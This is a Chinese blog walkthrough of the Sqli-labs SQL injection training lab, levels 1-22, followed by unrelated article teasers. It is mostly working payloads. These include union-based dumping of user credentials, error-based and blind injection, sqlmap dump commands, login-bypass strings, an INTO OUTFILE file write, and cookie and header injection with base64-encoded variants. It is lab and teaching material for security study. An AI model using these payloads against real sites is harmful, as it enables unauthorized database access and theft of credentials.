Sqlilabs注入靶场(122)

作者：美猴qing_243 | 来源：互联网 | 2023-06-13 17:35

Sqli-labs靶场1-22Sql注入的本质是代码和数据的未分离，导致用户的输入可以对数据库产生恶意的输入或输出。本篇博客旨在通过Sqli-labs的第1-22关，详细的描述Sq

Sqli-labs靶场1-22
Sql注入的本质是代码和数据的未分离，导致用户的输入可以对数据库产生恶意的输入或输出。
本篇博客旨在通过Sqli-labs的第1-22关，详细的描述Sql注入的相关场景及分类。

Less-1

GET型传参,字符型注入,单引号闭合

首先判断闭合,输入单引号时，出现报错信息，判断是单引号闭合

#出现报错信息
http://127.0.0.1/sqli-labs/Lesss-1/?id=1 '
#报错信息消失,由此判断是单引号闭合
http://127.0.0.1/sqli-labs/Lesss-1/?id=1 '#
#进行注入
http://127.0.0.1/sqli-labs/Lesss-1/?id=1 ' order by 3 # //回显正确
http://127.0.0.1/sqli-labs/Lesss-1/?id=1 ' order by 4 # //回显错误，报错信息为: Unknown column '4' in 'order clause'
判断有3列
#查看报错位
http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,3 # //查看到报错位为2,3;注意这里id=-1才可以显示想要的回显
#正式进行注入
http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,version(),database() # //查看版本，数据库名称
http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() # //查看到数据表名为emails,referers,uagents,users
http://127.0.0.1/sqli-labs/Lesss-1/?id=-1 ' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' # //查询到users数据表的数据列为:id,username,password
http://127.0.0.1/sqli-labs/Lesss-1/?id=-1’
union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users # //注入出数据库所有的内容

Less-2

GET型传参，数字型注入

#正常显现
127.0.0.1/sqli-labs/Lesss-2/?id=1
#and逻辑运算符判断,为假时出现异常
127.0.0.1/sqli-labs/Lesss-2/?id=1 and 1=2 //得出结论为数字型注入
#进行注入
http://127.0.0.1/sqli-labs/Lesss-2/?id=-1
union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users # //注入出数据库所有内容

Less-3

GET型传参,字符型注入，闭合为（' '）

#正常回显
http://127.0.0.1/sqli-labs/Lesss-3/?id=1 ') #
#进行注入
http://127.0.0.1/sqli-labs/Lesss-3/?id=-1 ') union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users #

Less-4

GET型传参，字符型注入，闭合为("")

#出现报错信息
http://192.168.28.128/sqli-labs/Lesss-4/?id=2")
#正常回显
http://192.168.28.128/sqli-labs/Lesss-4/?id=2") #
#进行注入
http://192.168.28.128/sqli-labs/Lesss-4/?id=-1") union select 1,2,group_concat(id,0x3a,username,0x3a,password) from security.users #

Less-5

GET型传参，布尔盲注,单引号闭合，考虑报错注入或者布尔盲注

方法1:报错注入

#注入出数据库版本
http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e,version()),0) #
#注入出表名
http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #
#注入出列名：
http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name='users' limit 0,1)),0) #
#注入出数据
http://192.168.28.128/sqli-labs/Lesss-5/?id=1 ' and updatexml(1,concat(0x7e, (select username from security.users limit 0,1)),0) #

方法2:Sqlmap 布尔型盲注

#查看数据表
sqlmap -u "http://192.168.28.128/sqli-labs/Lesss-5/?id=1" --current-db --batch --level 5 --threads 10
#进行数据注入
sqlmap -u "http://192.168.28.128/sqli-labs/Lesss-5/?id=1" -D "security" -T "users" -C "username,password" --dump --batch --level 5 --threads 10

Less-6

GET型传参，布尔传参，双引号闭合，考虑报错注入或者布尔盲注，方法与Less-5同，区别在于将单引号替换为双引号

#注入出数据库版本
http://192.168.28.128/sqli-labs/Lesss-6/?id=1" and updatexml(1,concat(0x7e,version()),0) #
#注入出数据
http://192.168.28.128/sqli-labs/Lesss-6/?id=1" and updatexml(1,concat(0x7e, (select username from security.users limit 0,1)),0) #

Less-7

通过本关名称可以看出是写入，这里涉及到一个概念：

MYSQL新特性secure_file_priv 对读写文件的影响，此开关默认为NULL,即不允许导入导出，这个对我们写入shell有重要的影响

secure_file_priv	结果
null	不允许导入导出
空	可以读写，但不可以动态更改
指定文件夹	mysql的导入导出只能发生在指定文件夹

http://192.168.28.128/sqli-labs/Less-7/?id=1 ')) union select 1,database(),user() into outfile "E:/phpstudy/PHPTutorial/WWW/sqli-labs/Less-7"#

方法2:时间盲注

使用Sqlmap或者自己编写Python脚本

sqlmap -u "192.168.28.128/sqli-labs/Less-7/?id=1" --threads 10 --level 3 -D security -T users -C id,password,username --dump

Less-8

GET型传参,布尔盲注，单引号闭合，无过滤，Sqlmap可以直接出

sqlmap -u "http://192.168.28.128/sqli-labs/Less-8/?id=1" -D security -T users -C id,password,username --dump --threads 10 --level 5 --batch --technique B --dbms mysql

Less-9

GET型传参,无论输入正确与否皆为You are in，单引号闭合，时间盲注，Sqlmap直接出

sqlmap -u "http://192.168.28.128/sqli-labs/Less-9/?id=1" -D security -T users -C id,password,username --dump --threads 10 --level 5 --batch --technique T --dbms mysql

Less-10

GET型传参,无论输入正确与否皆为You are in ,双引号闭合，时间盲注，Sqlmap直接出

#延迟3秒刷新
http://127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(3) --+
#Sqlmap注入
sqlmap -u "http://192.168.28.128/sqli-labs/Less-10/?id=1" -D security --tables --threads 10 --level 5 --batch --technique T --dbms mysql

Less-11

POST型传参，单引号闭合，可使用报错注入，也可使用万能密码

#POST型传参,发现登录成功
uname=admin '+or+ '1 '= '1&passwd=123&submit=Submit
#POST型注入工作
uname=admin") and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-12

POST型传参,闭合为")，同Less-11

#POST型传参,发现登录成功
uname=admin" )+or+("1" )=("1&passwd=123&submit=Submit
#POST型注入工作
uname=admin") and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-13

POST型传参，闭合为(''),考虑盲注或者报错注入

#报错注入
uname=admin ' )and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit
#时间盲注
sqlmap -r 1.txt --current-db --technique T --batch --threads 10 --dbms mysql

Less-14

POST型传参，闭合为” “,考虑报错注入

#报错注入
uname=admin"and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) #&passwd=123&submit=Submit

Less-15

POST型传参,闭合为‘’，时间盲注或者布尔盲注，考虑用Sqlmap一把嗦

sqlmap -r 2.txt --technique T --dbms mysql --current-db --batch --threads 10 --level 5

Less-16

同Less-15,不过闭合是（“”),可以考虑自己构造python脚本，或者Sqlmap.

sqlmap -r 3.txt --technique T --dbms mysql --current-db --batch --threads 10 --level 5

Less-17

POST型传参，闭合为' ',注入点在password

uname=admin&passwd=admin' and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 0,1)),0) --+&submit=Submit

Less-18

POST型传参，UA型Insert注入，闭合方式为' and updatexml() and '1'='1 ,注意考虑闭合

' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),1) and '1'='1

Less-19

回显Refer，考虑Refer注入

http://127.0.0.1/sqli-labs/Less-19/' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and '1'='1

Less-20

COOKIE注入，在存储处修改COOKIE即可

' and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and '1'='1

Less-21

COOKIE注入，发现COOKIE处使用Base64编码,则将Less-20处Payload 使用Base64编码即可

YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IEBAYmFzZWRpciksMHg3ZSksMCkgYW5kICcxJz0nMQ==

Less-22

同COOKIE注入，并且使用了Base64编码，不同处是使用了双引号进行闭合

编码前Payload

" and updatexml(1,concat(0x7e,(select @@basedir),0x7e),0) and "1"="1

编码后Payload

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQGJhc2VkaXIpLDB4N2UpLDApIGFuZCAiMSI9IjE=

推荐阅读

select
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
text
在类中定义数组时出错 - Error on defining arrays in class

Iamtryingtomakeaclassthatwillreadatextfileofnamesintoanarray,thenreturnthatarra ... [详细]

蜡笔小新 2023-12-14 17:38:12
select
数据库的存储结构及其重要性

本文介绍了数据库的存储结构及其重要性，强调了关系数据库范例中将逻辑存储与物理存储分开的必要性。通过逻辑结构和物理结构的分离，可以实现对物理存储的重新组织和数据库的迁移，而应用程序不会察觉到任何更改。文章还展示了Oracle数据库的逻辑结构和物理结构，并介绍了表空间的概念和作用。 ... [详细]

蜡笔小新 2023-12-14 16:00:02
text
如何限制php数据库链接数和连接超时时间？

本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目，以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数，以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]

蜡笔小新 2023-12-14 14:06:10
jsp
Hibernate基础映射

在说Hibernate映射前，我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象，以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]

蜡笔小新 2023-12-14 10:57:47
text
Spring特性实现接口多类的动态调用详解

本文详细介绍了如何使用Spring特性实现接口多类的动态调用。通过对Spring IoC容器的基础类BeanFactory和ApplicationContext的介绍，以及getBeansOfType方法的应用，解决了在实际工作中遇到的接口及多个实现类的问题。同时，文章还提到了SPI使用的不便之处，并介绍了借助ApplicationContext实现需求的方法。阅读本文，你将了解到Spring特性的实现原理和实际应用方式。 ... [详细]

蜡笔小新 2023-12-14 03:24:19
text
关于cuowu类的错误提示和使用AdjustmentListener的问题

本文讨论了一个关于cuowu类的问题，作者在使用cuowu类时遇到了错误提示和使用AdjustmentListener的问题。文章提供了16个解决方案，并给出了两个可能导致错误的原因。 ... [详细]

蜡笔小新 2023-12-13 22:09:56
text
VB.NET在线急等问题解决方法，如何统计数据库字段下的数据并显示在文本框里？

本文介绍了一个在线急等问题解决方法，即如何统计数据库中某个字段下的所有数据，并将结果显示在文本框里。作者提到了自己是一个菜鸟，希望能够得到帮助。作者使用的是ACCESS数据库，并且给出了一个例子，希望得到的结果是560。作者还提到自己已经尝试了使用"select sum(字段2) from 表名"的语句，得到的结果是650，但不知道如何得到560。希望能够得到解决方案。 ... [详细]

蜡笔小新 2023-12-13 15:15:30
text
Android 7自学笔记总结、移动架构视频、安卓面试真题、项目实战源码讲义

本文介绍了Android 7的学习笔记总结，包括最新的移动架构视频、大厂安卓面试真题和项目实战源码讲义。同时还分享了开源的完整内容，并提醒读者在使用FileProvider适配时要注意不同模块的AndroidManfiest.xml中配置的xml文件名必须不同，否则会出现问题。 ... [详细]

蜡笔小新 2023-12-13 10:06:58
string
获取当前模块所在路径的GetModuleFileName函数用法详解

本文详细介绍了GetModuleFileName函数的用法，该函数可以用于获取当前模块所在的路径，方便进行文件操作和读取配置信息。文章通过示例代码和详细的解释，帮助读者理解和使用该函数。同时，还提供了相关的API函数声明和说明。 ... [详细]

蜡笔小新 2023-12-14 19:29:57
bash
解决Docker中volume的权限问题的方法

在Docker中，将主机目录挂载到容器中作为volume使用时，常常会遇到文件权限问题。这是因为容器内外的UID不同所导致的。本文介绍了解决这个问题的方法，包括使用gosu和suexec工具以及在Dockerfile中配置volume的权限。通过这些方法，可以避免在使用Docker时出现无写权限的情况。 ... [详细]

蜡笔小新 2023-12-14 18:48:02
python
搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的详细步骤

本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的步骤，包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]

蜡笔小新 2023-12-14 17:03:58
python
高校天文共享平台开发过程中的思考与规划

本文介绍了高校天文共享平台的开发过程中的思考和规划。该平台旨在为高校学生提供天象预报、科普知识、观测活动、图片分享等功能。文章分析了项目的技术栈选择、网站前端布局、业务流程、数据库结构等方面，并总结了项目存在的问题，如前后端未分离、代码混乱等。作者表示希望通过记录和规划，能够理清思路，进一步完善该平台。 ... [详细]

蜡笔小新 2023-12-13 18:08:58
python
解决Mac上无法使用localhost连接mysql的问题

本文介绍了在Mac上搭建php环境后无法使用localhost连接mysql的问题，并通过将localhost替换为127.0.0.1或本机IP解决了该问题。文章解释了localhost和127.0.0.1的区别，指出了使用socket方式连接导致连接失败的原因。此外，还提供了相关链接供读者深入了解。 ... [详细]

蜡笔小新 2023-12-13 17:48:58
text
C#制作Java+Mysql+Tomcat环境安装程序，一键式安装教程

本文介绍了如何使用C#制作Java+Mysql+Tomcat环境安装程序，实现一键式安装。通过将JDK、Mysql、Tomcat三者制作成一个安装包，解决了客户在安装软件时的复杂配置和繁琐问题，便于管理软件版本和系统集成。具体步骤包括配置JDK环境变量和安装Mysql服务，其中使用了MySQL Server 5.5社区版和my.ini文件。安装方法为通过命令行将目录转到mysql的bin目录下，执行mysqld --install MySQL5命令。 ... [详细]

蜡笔小新 2023-12-12 19:29:55

美猴qing_243

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章